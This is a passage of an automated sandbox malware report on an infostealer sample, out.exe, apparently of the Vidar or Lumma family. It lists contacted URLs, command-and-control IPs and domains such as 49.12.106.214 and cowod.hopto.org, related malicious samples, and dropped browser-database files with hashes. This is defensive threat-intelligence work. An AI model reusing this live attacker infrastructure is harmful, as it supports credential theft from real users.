                                                                                                                        		unknown
                                                                                                                        https://store.steampowered.com/about/76561199780418869[1].htm.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://steamcommunity.com/my/wishlist/out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                          		unknown
                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfmout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                            		unknown
                                                                                                                            https://49.12.106.214/_out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://help.steampowered.com/en/out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://steamcommunity.com/market/out.exe, out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                  		unknown
                                                                                                                                  https://store.steampowered.com/news/out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://49.12.106.214/Vout.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://community.akamai.steamstatic.com/out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiIIIEBG.0.drfalse
                                                                                                                                      		unknown
                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://store.steampowered.com/subscriber_agreement/out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgout.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                        		unknown
                                                                                                                                        https://49.12.106.214/msvcp140.dllyout.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://recaptcha.net/recaptcha/;out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://49.12.106.214/Iout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown

                                                                                                                                            World Map of Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public IPs

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            49.12.106.214
                                                                                                                                            		unknownGermany
                                                                                                                                            		24940HETZNER-ASDEtrue
                                                                                                                                            104.102.49.254
                                                                                                                                            		steamcommunity.comUnited States
                                                                                                                                            		16625AKAMAI-ASUStrue
                                                                                                                                            45.132.206.251
                                                                                                                                            		cowod.hopto.orgRussian Federation
                                                                                                                                            		59731LIFELINK-ASRUtrue

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                            Analysis ID:1528360
                                                                                                                                            Start date and time:2024-10-07 20:34:04 +02:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 6m 48s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                            Number of analysed new started processes analysed:8
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample name:out.exe
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@6/21@2/3
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 89
                                                                                                                                            • Number of non-executed functions: 216
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                            Warnings

                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                            • VT rate limit hit for: out.exe

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            14:35:26API Interceptor1x Sleep call for process: out.exe modified

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            49.12.106.214down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                • www.valvesoftware.com/legal.htm
                                                                                                                                                45.132.206.251f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                7f3c2473d1e6.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                cowod.hopto.orgf1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                7f3c2473d1e6.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CSY6k9gpVb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                HETZNER-ASDEdown.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 116.203.9.188
                                                                                                                                                BzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                • 188.40.141.211
                                                                                                                                                https://cloud.list.lu/index.php/s/znw4dNSttiDzHTBGet hashmaliciousUnknownBrowse
                                                                                                                                                • 85.10.195.17
                                                                                                                                                UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                • 188.40.141.211
                                                                                                                                                PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 148.251.114.233
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 116.203.9.188
                                                                                                                                                LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                • 188.40.141.211
                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 116.203.104.203
                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 116.203.104.203
                                                                                                                                                http://suraj-tumuluri.github.io/UI-Clone-NetflixGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 78.46.22.25
                                                                                                                                                LIFELINK-ASRUf1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                7f3c2473d1e6.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                cenSXPimaG.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                • 23.43.32.11
                                                                                                                                                FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CSY6k9gpVb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                http://kendellseafoods.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.44.86
                                                                                                                                                TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19PEDIDO-144848.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                jre-6-windows-i586.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                t5985gRtZo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                0urFbKxdvL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 104.102.49.254

                                                                                                                                                Dropped Files

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                C:\ProgramData\freebl3.dllwULBz8VjH0.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                    45Ywq5ad5H.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                      f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          NdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                            VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                    C:\ProgramData\mozglue.dllwULBz8VjH0.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                        45Ywq5ad5H.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                          f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                              NdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\AFIDGD

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\AFIDGD-shm

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\BKEBFHIJECFI\BAKKEG

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
